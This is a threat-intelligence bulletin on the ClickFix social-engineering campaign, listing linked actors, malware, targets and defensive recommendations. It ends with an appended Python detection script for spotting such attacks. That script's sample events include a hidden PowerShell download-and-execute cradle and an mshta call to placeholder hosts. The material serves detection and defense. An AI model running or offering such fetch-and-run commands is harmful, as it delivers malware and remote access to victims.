
Darkstream Dispatch Vol.5_ClickFix

August 11, 2025
Safe Online

Intelligence on Malware, Threat Actors, and Campaigns in Motion

Introduction

Darkstream Dispatch is a monthly intelligence report dedicated to tracking and analyzing malware families, threat actors, and cyber campaigns primarily targeting Civil Society Organizations (CSOs), human rights defenders, and advocacy groups. As digital threats become more sophisticated, CSOs face increasing risks from state-sponsored actors, cybercriminals, and surveillance campaigns designed to compromise their operations, communications, and safety. This volume focuses on a campaign that uses the ClickFix social engineering technique.

Description

Security researchers have reported a growing use of the ClickFix technique by threat actors. ClickFix is a social engineering tactic that persuades users to execute malicious commands or scripts on their own devices, usually under the guise of fixing a common computer problem. As its popularity among attackers has risen, the method has evolved into several forms, such as counterfeit error messages or fake reCAPTCHA prompts. These deceptive ploys lead victims to open a command prompt or the Run dialog and paste in attacker-supplied code. Once executed, the commands deliver a range of malicious payloads, including LUMMAC.V2, DARKGATE, and NETSUPPORT, which can steal sensitive credentials or grant remote access to the compromised system.

Overview

Campaign Type: Social Engineering

Motivations: Espionage, Financial Gain

Source Region: Eastern Europe, Mexico

Confirmed Targeted Industries: Civil Society & Non-Profits, Aerospace & Defense, Agriculture, Automotive, Chemicals & Materials, Construction & Engineering, Education, Energy & Utilities, Financial Services, Government, Healthcare, Hospitality, Insurance, Legal & Professional Services, Manufacturing, Media & Entertainment, Oil & Gas, Pharmaceuticals, Retail, Technology, Telecommunications, and Transportation

Associated Threat Actors: UNC2500, UNC4108, UBC4984, UNC5055, UNC5112, UNC5142, UNC5518, UNC5692, UNC5736, UNC5750, UNC5774, UNC5925, UNC5996, UNC6072, UNC6089, UNC6095, UNC6108

Associated Malware: ARECHCLIENT2, BLACKWIDOW, CHUNKPILE, CLEARSHORT, CROSSTRICK, CRYPTBOT.V3, CURLYFENCE, CURLYGATE, DARKGATE, FAKETREFF, IRONWIND, LUMMAC, LUMMAC.V2, MAPLESYRUP, PALEBEAM, PEAKLIGHT, PRIVATELOADER, RIGDUST, RIGTUNE, SHADOWLADDER, SHADOWLADDER.IDAT, SLOWPINE, SNAPDRAGON, STEALC, VIDAR, VOLTMARKER, WETJAR, WINDYTWIST.SEA, XWORM, ZAPCAT

Targeted Countries: Australia, Belgium, Canada, Czech Republic, Denmark, France, Germany, Hong Kong, Italy, Liechtenstein, Madagascar, Morocco, New Zealand, Philippines, Qatar, Singapore, Spain, Sweden, Switzerland, Togo, United Arab Emirates, United Kingdom, United States

Associated Tools: 7ZIP, ADVIPSCAN, ANYDESK, AUTOIT, BOINC, CURL, NETSUPPORT, NLTEST, POWERSHELL, RUBEUS, TEAMVIEWER, WHOAMI

Find the full list of IOCs here:

Security Recommendations

CcHUB recommends that organizations:

  • User Awareness & Training – Educate users on ClickFix tactics and on never running unverified commands or scripts, however plausible the "fix" looks.

  • Endpoint Security Controls – Restrict script execution, enforce least privilege, and use EDR/XDR for behavioral detection.

  • Application & System Controls – Implement application whitelisting (AppLocker/WDAC) and disable unnecessary command-line tools.

  • Email & Web Filtering – Use secure email gateways, DNS/web filtering, and browser protections to block malicious sites.

  • Threat Detection & Response – Monitor for suspicious command-line activity, update IoCs, and maintain an incident response playbook.

  • Patch & System Hardening – Keep systems updated, secure browsers/plugins, and apply group policies to block unsafe macros/scripts.
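The "monitor for suspicious command-line activity" recommendation above can be turned into a concrete check. The following is an added example, not code from CcHUB or from the report: it runs a ClickFix-shaped rule over a few constructed, Sysmon-style process-creation events. It assumes the user-launched variant (command pasted into the Run dialog, so the shell's parent is explorer.exe); the image names, indicator regexes and sample events are all assumptions made for this illustration.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style, simplified).
# Written for this example only; none of these are indicators from the report.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm http://example.invalid/fix)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://example.invalid/captcha"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c dir"},
]

# A ClickFix lure asks the victim to paste into the Run dialog, so the interpreter is
# spawned by explorer.exe. A paste into an already open console has the console as
# parent and is not covered by this rule (assumed scope of the example).
INTERACTIVE_PARENTS = {"explorer.exe"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "curl.exe"}

# Command-line traits a user fixing a genuine error would not type by hand.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"(?<!\w)-e(?:nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(
        r"\b(?:iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}

def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: dict) -> list[str]:
    """Names of the indicators that fire for one event; [] when the pattern does not apply."""
    if basename(event["ParentImage"]) not in INTERACTIVE_PARENTS:
        return []
    if basename(event["Image"]) not in SHELL_IMAGES:
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(event["CommandLine"])]

def detect_clickfix(events: list[dict]) -> list[tuple[int, list[str]]]:
    """(index, matched indicators) for every event that matches the ClickFix pattern."""
    return [(i, hits) for i, e in enumerate(events) if (hits := classify(e))]

if __name__ == "__main__":
    for idx, hits in detect_clickfix(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx]['CommandLine']!r} -> {', '.join(hits)}")
```

The script-from-svchost and the plain `cmd /c dir` events are left alone, so the rule flags only user-launched interpreters that also carry a hidden-window, encoded, download-cradle or remote-URL trait; in production, feed it the real ParentImage/Image/CommandLine fields from your EDR or Sysmon pipeline.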

To read more about the ClickFix social engineering campaign, kindly read the Group-IB article here.
If you suspect a security breach of any sort, reach out to us on our helpdesk (help@cchub.africa).
